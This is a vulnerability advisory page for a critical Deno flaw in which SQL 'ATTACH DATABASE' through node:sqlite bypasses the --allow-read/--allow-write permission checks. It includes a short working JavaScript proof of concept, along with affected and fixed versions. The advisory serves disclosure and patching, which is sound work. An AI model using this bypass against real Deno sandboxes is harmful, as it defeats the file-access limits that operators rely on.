VDB
Sign up
CRITICAL9.1

GHSA-8vxj-4cph-c596

Deno has --allow-read / --allow-write permission bypass in `node:sqlite`

Details

## Summary

It is possible to bypass Deno's read/write permission checks by using `ATTACH DATABASE` statement.

## PoC

```js // poc.js import { DatabaseSync } from "node:sqlite"

const db = new DatabaseSync(":memory:"); db.exec("ATTACH DATABASE 'test.db' as test;");

db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);"); ```

``` $ deno poc.js ```

Are you affected?

Enter the version of the package you're using.

Affected packages

crates.io/deno
Introduced in: 2.2.0Fixed in: 2.2.5

Upgrade deno to 2.2.5 or newer (ecosystem crates.io).

crates.io/deno_node
Introduced in: 0.129.0Fixed in: 0.134.0

Upgrade deno_node to 0.134.0 or newer (ecosystem crates.io).

References